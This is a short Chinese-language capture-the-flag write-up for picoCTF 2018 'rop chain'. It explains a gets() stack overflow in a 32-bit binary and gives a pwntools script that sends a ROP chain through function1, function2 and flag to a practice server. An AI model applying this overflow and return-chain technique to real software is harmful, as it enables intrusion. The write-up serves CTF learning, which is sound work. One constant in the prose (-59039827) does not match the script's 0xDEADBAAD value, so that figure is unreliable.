picoctf_2018_rop chain
例行检查 ,32位,开启NX保护。
运行一下。
用IDA打开。看到了flag.txt,
跟进查看
当win1&&win2 &&a1==-59039827时,得到flag。
查看main函数。
vuln中的gets函数存在溢出漏洞,覆盖ret为flag函数地址,之后想办法去满足那个if判断即可获得flag
function1函数 win1被 赋值为1
function2 当a1 == -1163220307时, win2也被赋值为1
首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win的值为1,之后去执行flag函数,if要满足的条件之前都设置好了,可以直接读出flag
from pwn import *
r = remote("node3.buuoj.cn", 26990)
win_function1 = 0x080485CB
win_function2 = 0x080485D8
flag = 0x0804862B
payload = "a" * 0x1c
payload += p32(win_function1)
payload += p32(win_function2) + p32(flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD)
r.sendlineafter("input> ", payload)
r.interactive()
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210409193720525.png)